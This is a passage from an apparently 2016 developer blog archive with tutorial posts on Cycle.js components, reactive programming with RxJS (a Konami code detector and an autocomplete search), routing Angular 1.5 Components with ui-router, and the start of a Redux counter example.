.map(ar => ar.reduce((total, count) => total + count, 0));
}).startWith(0);
/*
VIEW
Combine the counters$ and the totalCount$ whenever one of them
produces a value, take the latest value of both of them produced
and render a Virtual DOM tree with them.
*/
const vtree$ = counters$.combineLatest(totalCount$,
(counters, totalCount) =>
CycleDOM.div([
CycleDOM.h1('Counters'),
CycleDOM.div(counters.map((counter, index) =>
CycleDOM.div([
counter.DOM,
CycleDOM.button('.remove', { index: index }, 'remove')
])
)),
CycleDOM.button('.create-counter', 'Create Counter'),
CycleDOM.h2('Total: ' + totalCount)
])
);
const sinks = {
DOM: vtree$
};
return sinks;
}
// Takes a counter and adds it to the counter list.
function addCounter(counter) {
// Inner reducer function, is given the list of counters.
return function(counters) {
return counters.concat(counter); // Add the counter.
}
}
// Takes an index to remove a counter from the counter list.
function removeCounter(index) {
// Inner reducer function, is given the list of counters.
return function(counters) {
return counters.filter((_, i) => i !== index);
}
}
/*
Creates an isolated version of the Counter component via CycleIsolate.
This way two Counter components do not get in each other's way.
Behind the scenes Cycle.js will alter the Virtual DOM of each
Counter to make each counter identifiable. You can inspect the DOM
via the browser to see what it does.
For fun you can alter the body of this function to
'return Counter({ DOM: sources.DOM });' to see the effect of
not having isolated Components.
*/
function IsolatedCounter(sources) {
return CycleIsolate(Counter)({ DOM: sources.DOM });
}
Cycle.run(CounterList, {
DOM: CycleDOM.makeDOMDriver('#content')
});
</code>
</pre>
A live example can be found here: <a href="http://codepen.io/anon/pen/EKddNO?editors=0010">http://codepen.io/anon/pen/EKddNO?editors=0010</a><br />
<br />
In the example above you can see that our friend the Counter Component exposes its internal 'count' to the outside world. CounterList then takes all the counts and tallies them up into a total. Two Components communicate with each other via streams: one Component's sink becomes part of the other Component's sources.<br />
<br />
It is also interesting to note that a Cycle application and a Cycle Component share the same structure: a Cycle application, just like a Cycle Component, takes sources and produces sinks. You could say that a Cycle Component is simply a Cycle application, and a Cycle application is simply a Cycle Component. The name Cycle.js was really well chosen!<br />
<br />
I have to give <a href="https://github.com/rsbowman">Sean Bowman</a> credit for coming up with how to do multiple counters in this <a href="https://gist.github.com/rsbowman/033308ac60b2a56cb44e">gist</a>.<br />
<div>
<h2>
Resources</h2>
<div>
The <a href="http://cycle.js.org/dialogue.html">Cycle.js</a> website is a real treat because it elegantly and might I say beautifully explains its philosophy.</div>
<div>
<br /></div>
<div>
The creator of Cycle.js, André Staltz, also created a great video course explaining the basics of Cycle.js: <a href="https://egghead.io/series/cycle-js-fundamentals">https://egghead.io/series/cycle-js-fundamentals</a>.</div>
<h2>
Conclusions</h2>
<div>
This week we saw an observable-based Component architecture in practice. In the weeks before that we saw a unidirectional architecture with Flux and Redux.</div>
<div>
<br /></div>
<div>
<a href="http://dontpanic.42.nl/2016/08/post-mvc-conclusions.html">Next week</a> I want share with you some of my conclusions.</div>
</div>
Anonymousnoreply@blogger.com6tag:blogger.com,1999:blog-8962763253387334081.post-21575680317623133642016-07-21T12:00:00.000+02:002016-07-28T14:51:47.145+02:00Post-MVC part 6: Reactive Programming<h2>
Intro</h2>
<a href="http://dontpanic.42.nl/2016/07/redux.html">Last week</a> I ended on a cliffhanger saying React is often <a href="http://staltz.com/why-react-redux-is-an-inferior-paradigm.html">criticized</a> for not being truly reactive. So this week I want to define what Reactive Programming is all about.<br />
<h2>
Reactive Programming</h2>
To define Reactive Programming we must first look at the form of programming most of us are used to; in the reactive world it is called 'Passive Programming'. The terms passive and reactive come from the way two 'components' communicate with each other.<br />
<br />
In Passive Programming the relationship between two components is that one component usually controls the other. For example, if we have a Car and an Engine component, the Car triggers the Engine. An example in code:<br />
<a name='more'></a><pre><code class="javascript">
Car.prototype.turnKey = function() {
this.engine.fireUp();
}
</code>
</pre>
The Engine is passive: it never actually starts until some other object explicitly starts it, in this case the Car.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-q9UHtVDgGkc/V49ovIaYjbI/AAAAAAAAAFA/CD1dre4iwQYYBy1-AMN6Bq39mOqorumFwCLcB/s1600/Passive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-q9UHtVDgGkc/V49ovIaYjbI/AAAAAAAAAFA/CD1dre4iwQYYBy1-AMN6Bq39mOqorumFwCLcB/s1600/Passive.png" /></a></div>
<br />
In Reactive Programming the relationship is inverted. The Engine starts itself based on certain events; in this case the event would be the Car's key being turned. In pseudo code:
<br />
<pre><code class="javascript">
Engine.listenToKey = function(car) {
car.onKeyTurned(() => {
this.fireUp();
});
}
</code>
</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-eUvgaqv9KJ0/V49o8JgVPAI/AAAAAAAAAFE/fDozhY9CRGcv2wNS83SL0i5AOwoyZzg4gCLcB/s1600/Reactive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-eUvgaqv9KJ0/V49o8JgVPAI/AAAAAAAAAFE/fDozhY9CRGcv2wNS83SL0i5AOwoyZzg4gCLcB/s1600/Reactive.png" /></a></div>
<br />
<br />
The difference between Passive and Reactive is that the Engine is now responsible for starting itself. This maps back nicely to the second blog post, <a href="http://dontpanic.42.nl/2016/06/post-mvc-mvc-and-javascript.html">MVC and JavaScript</a>, in which we learned that Components should be isolated and responsible for themselves. This means that to understand how the Engine works we only have to read the Engine's source code.<br />
<br />
In Passive Programming you would have to hunt down each line of code that calls fireUp() to understand when the state of the Engine is mutated and by whom.<br />
<br />
Reactive Programming also has a drawback: when you change the 'onKeyTurned' event you will have to hunt down all 'observers' to see how the change affects them.<br />
<br />
Reactive Programming and Passive Programming invert each other in this regard. The benefits of the one are the cons of the other and vice versa.<br />
<br />
The proponents of Reactive Programming advocate that this is a good trade-off because it leads to a better <a href="https://en.wikipedia.org/wiki/Separation_of_concerns">Separation of Concerns</a>. It is better to write a self-contained Component than a Component which is influenced non-transparently by other Components.<br />
<h2>
Observables</h2>
At the heart of Reactive Programming lies the &quot;Observable&quot;. An Observable can be looked at as a souped-up <a href="https://en.wikipedia.org/wiki/Observer_pattern">observer pattern</a> as defined by the GoF. It adds two capabilities to the observer pattern: the ability to complete, and the ability to signal an error.<br />
<br />
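In RxJS terms (the library used later in this post) this means a subscriber can provide three handlers. A minimal sketch:<br />
<pre><code class="javascript">
// Sketch: an Observable that emits three values and then completes.
// The subscriber provides a handler for values, for errors and for completion.
var numbers$ = Rx.Observable.from([1, 2, 3]);

numbers$.subscribe(
  function (value) { console.log('next:', value); },  // a new value / event
  function (error) { console.log('error:', error); }, // the error capability
  function () { console.log('done!'); }                // the completion capability
);
</code>
</pre>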
With the "Observable" you can listen to events, events can basically be anythings: mouse clicks, keyboard presses, new tweets, time passing, form submits, Ajax calls etc etc. The Component can then act on these evens as is appropriate for that Component.<br />
<br />
What makes Reactive Programming so powerful is the ability to manipulate these events. I could list the operations which can be performed, but that would be very abstract. I'll try to explain the concept by telling a story.<br />
<br />
Imagine you are working at a distribution center for packages. Orders come in and packages come out to the loading bay over a conveyor belt, where the delivery man loads them into his truck and delivers them.<br />
<br />
The delivery man is an observer of the conveyor belt: whatever package rolls off the belt, he needs to drive it to an address. He observes the 'end' of the conveyor belt; now let's look at the start of it.<br />
<br />
The first thing that is put on the conveyor belt is an order specification on paper. A robot reads that paper and performs an operation on it: it grabs all items from the order and places them on the conveyor belt. It transforms the order into the actual items the customer ordered.<br />
<br />
Further down the line another robot looks at the conveyor belt and sees the ordered items. To fill up the trucks efficiently it puts the items into boxes to save time and space.<br />
<br />
Then another robot sees the boxes and puts a label on them with the address where they need to be delivered.<br />
<br />
Then the final robot takes the labeled boxes off the conveyor belt and places them in a store. When there are enough boxes going to the same city it grabs those boxes and sends them to a truck. This prevents one driver from having to hop from city to city and makes the delivery process faster.<br />
<br />
The package then finally arrives via the conveyor belt to the delivery man. He loads them onto his truck and delivers them.<br />
<br />
Every robot in this story was an 'operator' which manipulated the 'stream', aka the conveyor belt. You can chain a bunch of operators to transform and manipulate the stream into something which is consumable by the Component.<br />
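As a rough sketch, the distribution center could be expressed as a chain of operators. This uses RxJS, which is only introduced in the next section, and the order objects and helper functions (orders$, itemsForOrder, addressFor, deliver) are made up for the example:<br />
<pre><code class="javascript">
// Sketch: the conveyor belt as a chain of stream operators.
// 'orders$', 'itemsForOrder', 'addressFor' and 'deliver' are imaginary helpers.
var packages$ = orders$
  .flatMap(function (order) {              // robot 1: order paper -> the actual items
    return Rx.Observable.from(itemsForOrder(order));
  })
  .bufferWithCount(3)                      // robot 2: pack items into boxes of three
  .map(function (box) {                    // robot 3: put an address label on the box
    return { box: box, address: addressFor(box) };
  });

packages$.subscribe(function (labeledBox) { // the delivery man at the end of the belt
  deliver(labeledBox);
});
</code>
</pre>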
<h2>
Libraries</h2>
<div>
<div>
The grand-daddy of all libraries is the <a href="http://reactivex.io/">ReactiveX</a> API. It specifies what an observable stream is supposed to look like, and provides implementations in various libraries. Here's a handy website which interactively shows the operations:<a href="http://rxmarbles.com/"> http://rxmarbles.com/</a>.</div>
<div>
<br /></div>
<div>
The JavaScript implementation of ReactiveX is called: <a href="https://github.com/Reactive-Extensions/RxJS">RxJS</a>.</div>
<div>
<br /></div>
<div>
Other libraries include: <a href="https://baconjs.github.io/">Bacon.js</a>, <a href="http://staltz.com/xstream/">xstream</a>, and <a href="https://github.com/rpominov/kefir">Kefir</a>.</div>
</div>
<div>
<h2>
Example: Konami Code</h2>
<div>
Let's look at an example of how to make an observable Konami Code stream. This example is written with RxJS:</div>
</div>
<div>
</div>
<pre><code class="javascript">
// The famous sequence of input's representing the KONAMI cheat code.
var KONAMI_CODE = ['UP', 'UP', 'DOWN', 'DOWN',
'LEFT', 'RIGHT', 'LEFT', 'RIGHT',
'B', 'A'];
/*
Takes a KeyBoardEvent and returns either a KONAMI_CODE key
or the value null.
It will return a KONAMI_CODE key when the KeyBoardEvent's key
matches a value in the KONAMI_CODE.
It will return null when the key is not part of the KONAMI_CODE.
*/
function eventToKonamiCode(event) {
switch (event.which) {
case 38: return 'UP';
case 40: return 'DOWN';
case 37: return 'LEFT';
case 39: return 'RIGHT';
case 66: return 'B';
case 65: return 'A';
}
return null;
}
/*
Checks if the codes parameter, which is an array, matches the KONAMI_CODE exactly.
*/
function isKonamiCode(codes) {
return _.isEqual(codes, KONAMI_CODE);
}
/*
Appends the 'code' parameter to the 'codes' parameter, if the
code is the next part of the KONAMI_CODE sequence.
If the code is not the next sequence of the KONAMI_CODE an
empty array is returned.
*/
function codeAccumulator(codes, code) {
// Not a normal KONAMI_CODE key so return an empty array.
if (code === null) {
return [];
}
codes.push(code);
// Check if 'codes' still matches the KONAMI_CODE.
var subKonamiCode = _.take(KONAMI_CODE, codes.length);
if (_.isEqual(codes, subKonamiCode)) {
return codes;
} else {
return []; // No match back to square one.
}
}
var konamiStream = Rx.Observable.fromEvent(document, 'keydown')
.map(eventToKonamiCode)
.scan(codeAccumulator, [])
.filter(isKonamiCode);
var livesSpan = document.querySelector('span');
konamiStream.subscribe(function() {
alert('You entered the Konami code!');
livesSpan.textContent = '99';
});
</code>
</pre>
<div>
<div>
The full example can be found at: <a href="http://codepen.io/anon/pen/ZOxGAq?editors=0010">http://codepen.io/anon/pen/ZOxGAq?editors=0010</a></div>
<h2>
Benefits of Reactive Programming</h2>
<div>
The Konami code snippet displays the great benefit of the streams approach. Every Component can listen to the entry of the Konami Code and do something with it. The Component itself decides to 'react' to the Konami Code and not the other way around.</div>
<div>
<br /></div>
<div>
Having such a loose relationship between the consumer and the producer of a stream allows for a greater separation of concerns. A classic example from the Reactive world is an autocomplete component: the user enters some text, an Ajax request is fired, some data comes back and is displayed.</div>
<div>
<br /></div>
<div>
This seems really trivial to implement but is actually quite hard. Let's look at a naive implementation:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.map(search) // Search does an 'ajax' request
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
After a while a back-end developer tells you the server cannot handle the massive amount of requests the front-end sends. It turns out every keystroke results in a request to the server.<br />
<br />
If the user types &quot;Battlestar&quot; really fast, a request for &quot;B&quot;, &quot;Ba&quot;, &quot;Bat&quot;, &quot;Batt&quot;, and so on is made. Luckily RxJS has an operator just for this called debounce. It will filter out events that happen close to each other:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.debounce(500) // Wait for 500 milliseconds after the last event.
.map(search) // Search does an 'ajax' request
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
It turns out that the search doesn't find things accurately when the query has three characters or fewer. So we only let through queries that have more than three characters:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.filter(query => query.length > 3) // Only when more than three characters
.debounce(500) // Wait for 500 milliseconds after the last event.
.map(search) // Search does an 'ajax' request
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
Now we discover that the same query is sometimes sent to the server two times in a row, even with the debounce. This happens when the user starts typing again after a query, but changes his mind and backspaces to his original query. No need to send the request again then.<br />
<br />
RxJS has the distinctUntilChanged operator for this use case. It makes sure that events are only fired when they are different from the last event:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.filter(query => query.length > 3) // Only when more than three characters
.debounce(500) // Wait for 500 milliseconds after the last event.
.distinctUntilChanged() // Only if the query has changed
.map(search) // Search does an 'ajax' request
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
Can anything still go wrong? Sure, a rather insidious bug can still occur: when two Ajax calls are made and the server is slow to respond, the first call's response can come in after the second call's response.<br />
<br />
So if the user types 'Battle' and waits before finishing with 'Star', there will be two requests: one for 'Battle' and one for 'BattleStar'. If the server delivers the 'BattleStar' response first and the 'Battle' response later, the user will see results for 'Battle', which is unexpected.<br />
<br />
RxJS comes to the rescue yet again with 'flatMapLatest': it makes sure only the latest search query's response is used:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.filter(query => query.length > 3) // Only when more than three characters
.debounce(500) // Wait for 500 milliseconds after the last event.
.distinctUntilChanged() // Only if the query has changed
.flatMapLatest(search) // Use only the response for the last query.
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
With each improvement we did not have to update the code that 'displays' the data, aka the subscriber / consumer of the observable.<br />
<br />
This is a very powerful benefit. In essence this allows us to change anything about the way we deliver the end result, as long as we in the end deliver something the consumer expects.<br />
<br />
The consumer of the data is not concerned with how the data is produced.<br />
<br />
The producer of the data is not concerned with how the data is consumed.<br />
<h2>
Cons of using Reactive Programming</h2>
<h3>
We are not in Kansas anymore (again)</h3>
Reactive Programming has a weakness that it shares with Redux: it is not always easy to learn. Observables, operators, streams, hot versus cold, and so on.<br />
<br />
While all of these things are not that difficult to learn, there are many of them. Thinking about Components and applications with these new concepts requires you to learn a new philosophy, and a different way of doing things.<br />
<br />
<h3>
Conceptually Difficult</h3>
Reactive Programming can sometimes be conceptually mind-bendingly difficult.<br />
<br />
From my personal experience, let's take the dynamic list of Counters. Next week I will demonstrate how to create this in Cycle.js. It took me quite a long time to program this particular example: I could not for the life of me figure out how to create the total count.<br />
<br />
I had an observable array of Counters, where each item was a Counter with an observable inner count$. I had to find a way to combine all count$ streams into one array and do a simple reduce on it.<br />
<br />
After some Googling I found this solution:
<br />
<pre><code class="javascript">
const totalCount$ = counters$.flatMapLatest(counters => {
  // Combine the count$ of every counter into one stream of arrays,
  // then reduce each array to the total count.
  return Rx.Observable.combineLatest(counters.map(counter => counter.count$))
    .map(arr => arr.reduce((total, count) => total + count, 0));
}).startWith(0);
</code>
</pre>
In retrospect this solution is obvious. But coming from an imperative world you really have to rewire your mind. Thinking in streams instead of values takes some getting used to.<br />
<br />
It doesn't help that the documentation for RxJS / ReactiveX is highly conceptual. It does not always provide clear use cases for some operators, making it difficult to know if you have found the correct one.<br />
<br />
Having said that, it was an immensely satisfying experience that has taught me a lot about the nature of some problems. Once your brain makes the 'click' you will see uses for streams everywhere.<br />
<br />
The 'autocomplete' example is a very hard problem to solve elegantly without observables. With observables it is very easy to add lots of functionality just by combining the right operators.<br />
<h2>
Resources</h2>
I really recommend reading André Staltz's excellent introduction to <a href="https://gist.github.com/staltz/868e7e9bc2a7b8c1f754">Reactive Programming</a>.<br />
<h2>
Components and Observables</h2>
This week's post explained the basics of Observables but did not go into any detail on how this powerful concept can be used in combination with a Component based architecture.<br />
<br />
<a href="http://dontpanic.42.nl/2016/07/cyclejs.html">Next week</a> we will do just that by looking at <a href="http://cycle.js.org/">Cycle.js</a>.</div>
</div>
Anonymousnoreply@blogger.com11tag:blogger.com,1999:blog-8962763253387334081.post-86826231267720906112016-07-20T12:40:00.003+02:002016-07-21T11:22:40.547+02:00Using ui-router as a Component Router<h2>
Intro</h2>
In Angular 1.5 we got the <a href="https://docs.angularjs.org/guide/component">Component</a>, which is an improvement on our old pal the <a href="https://docs.angularjs.org/guide/directive">Directive</a>. In fact a Component is just a Directive with some default settings and a nicer API.<br />
<br />
Here is a <a href="https://toddmotto.com/exploring-the-angular-1-5-component-method/">great blog post</a> by Todd Motto which explains Components in depth, and compares them to ordinary directives.<br />
<h2>
A tale of two Components</h2>
Components have one other nice feature, they are closely aligned to the way Angular 2.0 will work. In fact if you squint your eyes you cannot really see the difference:<br />
<a name='more'></a><br />
Here is a nameCard Component in Angular 1.x:
<br />
<pre> <code class="javascript">
angular.module('myApp',[])
.component('nameCard', {
  bindings: {
    name: "@"
  },
  controllerAs: 'nameCardController',
  template: `
    <h1>Hi my name is</h1>
    <h2>{{ nameCardController.name }}</h2>
  `
});
</code>
</pre>
Here is a nameCard Component in Angular 2.x:
<br />
<pre> <code class="javascript">
@Component({
  selector: 'name-card',
  template: `
    <h1>Hi my name is</h1>
    <h2>{{ name }}</h2>
  `
})
export class NameCardComponent {
  @Input() name: String;
}
</code>
</pre>
Here is how you use both of them:
<br />
<pre> <code class="html">
<name-card name="Maarten"></name-card>
</code>
</pre>
<div>
<h2>
Why use Components in Angular 1.5</h2>
<div>
So using Components in Angular 1.5 gets you pretty close to the way Angular 2.0 works, which makes migrating to 2.0 a lot easier.</div>
<div>
<br /></div>
<div>
That is why we at 42 decided to use Components instead of Controllers and Element Directives (with restrict E), to prepare us for the migration ahead.</div>
<h2>
ui-router as a Component Router</h2>
<div>
But we hit one problem: we use ui-router, which is not geared towards using Components... or is it?</div>
<div>
<br /></div>
<div>
Turns out you can get ui-router to work with components quite easily:</div>
</div>
<pre> <code class="javascript">
angular.module('myApp', ['ui.router'])
.config(function($stateProvider) {
  $stateProvider.state('home', {
    url: '/greetings',
    template: '<name-card name="Maarten"></name-card>'
  })
})
.component('nameCard', {
  bindings: {
    name: "@"
  },
  controllerAs: 'nameCardController',
  template: `
    <h1>Hi my name is</h1>
    <h2>{{ nameCardController.name }}</h2>
  `
});
</code>
</pre>
<div>
<div>
Basically what we do is say that the template of the 'home' state is simply the use of a single Component. This way there is no need to define a controller and a separate template HTML file for the state.</div>
<div>
<br /></div>
<div>
You can see it live here: <a href="http://codepen.io/anon/pen/jAzOqQ?editors=0010#greetings">http://codepen.io/anon/pen/jAzOqQ?editors=0010#greetings</a></div>
<div>
<br /></div>
<h3>
Dealing with $stateParams</h3>
<div>
The first example hard-coded my name into the Component. What if we want to take the name from the URL instead, to make it more dynamic:</div>
</div>
<pre> <code class="javascript">
angular.module('myApp', ['ui.router'])
.config(function($stateProvider) {
  $stateProvider.state('home', {
    url: '/greetings/:name',
    template: '<name-card></name-card>'
  })
})
.component('nameCard', {
  controllerAs: 'nameCardController',
  controller: function($stateParams) {
    const nameCardController = this;
    nameCardController.name = $stateParams.name;
  },
  template: `
    <h1>Hi my name is</h1>
    <h2>{{ nameCardController.name }}</h2>
  `
});
</code>
</pre>
<div>
<div>
In this example we simply inject the $stateParams into the controller for the nameCard Component, and use it to get the name from the URL.
<div>
</div>
<div>
<br /></div>
<div>
You can see it live here: <a href="http://codepen.io/anon/pen/XKEWpW?editors=0010#/greetings/Gertrude">http://codepen.io/anon/pen/XKEWpW?editors=0010#/greetings/Gertrude</a></div>
<div>
<br /></div>
<h3>
Dealing with resolves</h3>
<div>
What if we have resolves in our states, how do we deal with that? The answer is by using a 'route' controller, like this:</div>
</div>
<pre> <code class="javascript">
angular.module('myApp', ['ui.router'])
.config(function($stateProvider) {
  $stateProvider.state('home', {
    url: '/greetings',
    template: '<name-card name="homeRouteController.name"></name-card>',
    controllerAs: "homeRouteController",
    controller: function(name) {
      const homeRouteController = this;
      homeRouteController.name = name;
    },
    resolve: {
      name: function() {
        /*
          Of course in real life this would get
          some data from some REST API.
        */
        return "Maarten";
      }
    }
  })
})
.component('nameCard', {
  bindings: {
    name: "<"
  },
  controllerAs: 'nameCardController',
  template: `
    <h1>Hi my name is</h1>
    <h2>{{ nameCardController.name }}</h2>
  `
});
</code>
</pre>
<div>
<div>
The job of a 'route' controller is to act purely as glue between the resolve and the Component. It injects all the 'resolves' and puts them on the scope, so that the template can access them.</div>
<div>
<br /></div>
<div>
Also note that the binding in the Component uses a one way binding (<) now instead of an interpolation binding (@), because name is now a variable instead of a string.</div>
<div>
<br /></div>
<div>
You can see it live here: <a href="http://codepen.io/anon/pen/ZOxEZz?editors=0010#greetings">http://codepen.io/anon/pen/ZOxEZz?editors=0010#greetings</a></div>
<div>
<br /></div>
<h3>
A Nuclear Weapon</h3>
<div>
There is one final weapon in our arsenal: the templateProvider. It allows you to dynamically create a template which ui-router will use.</div>
<div>
<br /></div>
<div>
We can implement the example from 'Dealing with $stateParams' with templateProvider like this:</div>
</div>
<pre> <code class="javascript">
angular.module('myApp', ['ui.router'])
.config(function($stateProvider) {
  $stateProvider.state('home', {
    url: '/greetings/:name',
    templateProvider: function($stateParams) {
      const name = $stateParams.name;
      return `<name-card name="${name}"></name-card>`;
    }
  })
})
.component('nameCard', {
  bindings: {
    name: "@"
  },
  controllerAs: 'nameCardController',
  template: `
    <h1>Hi my name is</h1>
    <h2>{{ nameCardController.name }}</h2>
  `
});
</code>
</pre>
<div>
You can see it live here: <a href="http://codepen.io/anon/pen/XKEWpW?editors=0010#/greetings/barry">http://codepen.io/anon/pen/XKEWpW?editors=0010#/greetings/barry</a></div>
<div>
<div>
<br /></div>
<div>
In the templateProvider you have access to all resolves and you can inject any service / factory that you need.</div>
<div>
<br /></div>
<div>
In this example we use it to create a route which passes the 'name' from the $stateParams as a string. This way the nameCard does not need to use a one way binding, but has an interpolation binding instead.</div>
<div>
<br /></div>
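<div>
As a side note: since resolves are injectable here as well, the 'name' resolve from the earlier example could be passed to the Component without a 'route' controller at all. A minimal sketch:</div>
<pre> <code class="javascript">
angular.module('myApp', ['ui.router'])
.config(function($stateProvider) {
  $stateProvider.state('home', {
    url: '/greetings',
    resolve: {
      name: function() {
        // In real life this would get some data from some REST API.
        return "Maarten";
      }
    },
    // The resolve is injected directly, no 'route' controller needed.
    templateProvider: function(name) {
      return `<name-card name="${name}"></name-card>`;
    }
  })
});
</code>
</pre>
<div>
<br /></div>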
<div>
The reason I think this is a nuclear weapon is because you do not really need it. TemplateProviders hide the 'router' from your Component and I feel that this is dishonest. A Component should be aware that it represents a 'state' by injecting the $stateParams in its controller.</div>
<div>
<br /></div>
<div>
In Angular 2.0, when a Component needs a parameter from the route it will get it itself; see this <a href="http://victorsavkin.com/post/145672529346/angular-router">blog post</a> by Victor Savkin under the heading "Using Params". That is why I advocate always injecting the $stateParams in the Component, so it is closer to best practices in Angular 2.0.<br />
<h2>
ui-router 1.0.0</h2>
</div>
<div>
In ui-router 1.0.0 it is going to be even easier to route to a Component, because it will be directly supported by ui-router. See this page: <a href="https://ui-router.github.io/tutorial/ng1/hellosolarsystem">https://ui-router.github.io/tutorial/ng1/hellosolarsystem</a> on how to do this.</div>
<h2>
Conclusion</h2>
<div>
Using Components in Angular 1.5 will make migrating easier.</div>
<div>
<br /></div>
<div>
Using ui-router as a Component router is really not that hard.</div>
<div>
<br /></div>
<div>
That is it, happy routing!</div>
</div>
Anonymousnoreply@blogger.com37tag:blogger.com,1999:blog-8962763253387334081.post-68795257676499477852016-07-15T09:58:00.001+02:002016-07-21T13:27:34.038+02:00Post-MVC part 5: Redux<h2>
Intro</h2>
<a href="http://dontpanic.42.nl/2016/07/enter-the-flux.html" target="_blank">Last week</a> we delved into Flux and saw the benefits of having a unidirectional architecture. We also learned that there were multiple Flux implementations, each implementing Flux in slightly different ways to improve upon it.<br />
<br />
This week I want to take a look at <a href="http://redux.js.org/index.html" target="_blank">Redux</a> which takes Flux and improves it greatly making all sorts of cool things possible. Redux is the most <a href="https://github.com/kriasoft/react-starter-kit/issues/22" target="_blank">popular</a> Flux implementation at the moment.<br />
<h2>
Redux</h2>
Redux takes Flux and improves on it, so what are the differences between Flux and Redux?<br />
<br />
<h3>
A single source of Truth</h3>
Flux has the concept of Stores, which represent a group of domain entities and the operations that can be performed on them. For example a CarStore would contain all 'car' objects and have operations to add and remove cars.<br />
<br />
Each domain entity has its own Store. This means that the 'state' of the application, whilst having a clear location, is still spread over multiple objects. Redux argues against this approach: it has a single Store for all entities. In other words the entire state of the application is stored inside a single variable.<br />
<br />
This sounds a bit like a mad idea but it actually has benefits.<br />
<a name='more'></a><br />
Do you know what this reminds me of... websites. Earlier in my career I interned as a PHP developer at a company that made websites. To make the websites more dynamic we used PHP in combination with MySQL as the database to store the state in.<br />
<br />
The database was the single source of truth. Whatever data was in the database was the truth. The PHP layer simply took that data and transformed it into HTML for the browser to render.<br />
<br />
Whenever something glitchy happened due to a loss of network connection, or some JavaScript enhancement that did not work for some reason, we always told the customer to simply reload the 'page'. This would give them the representation of what was in the database at that moment. In other words the page would show the correct 'state' again. They might lose some data in the process but at least they knew the 'truth' again.<br />
<br />
Having a single source of truth made debugging easier. If we saw some strange text we would check the database to see the actual 'truth'. If there was a mismatch the PHP must have done something with the value we did not expect. I would trace the value through the system until I found the culprit.<br />
<br />
Redux brings back this workflow. See something strange on the page, check the 'truth' first and then figure out what the problem is.<br />
<br />
A single source of truth on the client side also has some debugging benefits. Imagine sending the current state whenever a JavaScript error occurs, including a list of actions, back to the server. You can then locally on your dev machine, load the state for that user at that particular time and replay the actions. With a single source of truth this is trivial, imagine doing the same in an Angular 1.x application!<br />
<br />
Having the state in one location also makes Redux conceptually easier. You simply know where the state is located in your application.<br />
<br />
<h3>
Dispatcher</h3>
Redux no longer has a Dispatcher. In Flux the Dispatcher, a singleton, would act as a conduit for all Actions; the stores would register themselves to the Dispatcher to be notified when an Action occurred.<br />
<br />
Since there is only a single Store in Redux, the Dispatcher as a separate object is no longer needed. The singular Store itself takes on this responsibility instead. So while there is still a Dispatcher concept, it has been merged into the Store.<br />
<br />
<h3>
Pure Reducers</h3>
Redux also has a very strict philosophy on how the state is changed. Redux advocates doing state change via pure functions. A <a href="https://en.wikipedia.org/wiki/Pure_function" target="_blank">pure function</a> has the following characteristics:<br />
<br />
A pure function does not mutate anything in the outside world. Whatever the state was outside of the function that state will be the same after the function was called. In other words external variables / objects / arrays will not be changed.<br />
<br />
A pure function will always give the same output when the same input is given. In other words if you give a function the same parameters / arguments it will always return the same output. For example, if we give a function the parameters 10 and 12 and it returns 42, it should always return 42 whenever the parameters 10 and 12 are given.<br />
<br />
These two characteristics make pure functions very reliable and easy to test. They also make them very appropriate for handling state changes.<br />
<br />
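To make this concrete, here is a small, hypothetical example of an impure and a pure variant of the same counter function:<br />
<pre><code class="javascript">
// Impure: it mutates the counter object that was passed in, so the outside
// world changes as a side effect of calling the function.
function incrementImpure(counter) {
  counter.count += 1;
  return counter;
}

// Pure: it leaves the original counter untouched and returns a brand new
// counter, and the output depends only on the input.
function incrementPure(counter) {
  return { count: counter.count + 1 };
}
</code>
</pre>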
Redux has a single Store which can be modified by sending Actions to it. The Actions are processed by a single 'Reducer'. A reducer is a function which takes the previous state and the Action and returns a completely new state. Redux's website describes the signature of a reducer as follows: (previousState, action) => newState.<br />
<h2>
Counter App Example</h2>
Let's look at a simple example. Let's say we have an application which counts how many laps a person walked around a track. The application is very simple: it has two buttons, one to increment the count and one to decrement the count for when a mistake was made.<br />
<br />
Let's look at the store for such a state and its reducer:<br />
<pre><code class="javascript">
// The initial count starts at zero.
const initialCount = 0;
// Defines all possible actions as const's.
const INCREMENT_COUNTER = "INCREMENT_COUNTER";
const DECREMENT_COUNTER = "DECREMENT_COUNTER";
// Create the store with the reducer and the initial state.
let store = Redux.createStore(counterApp, initialCount);
// The reducer for the counter application.
function counterApp(state, action) {
  switch(action.type) {
    case INCREMENT_COUNTER:
      return state + 1;
    case DECREMENT_COUNTER:
      return state - 1;
  }
  return state;
};
/* Action creator functions: functions that create Redux actions */
function incrementCounter() {
  return {
    type: INCREMENT_COUNTER
  };
}
function decrementCounter() {
  return {
    type: DECREMENT_COUNTER
  };
}
</code>
</pre>
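The buttons in the application would then dispatch these actions to the store, and the view subscribes to the store to know when to re-render, roughly like this:<br />
<pre><code class="javascript">
// Runs after every dispatched action.
store.subscribe(function() {
  console.log('Laps walked: ' + store.getState());
});

// Dispatch actions, for example from the click handlers of the two buttons.
store.dispatch(incrementCounter()); // Laps walked: 1
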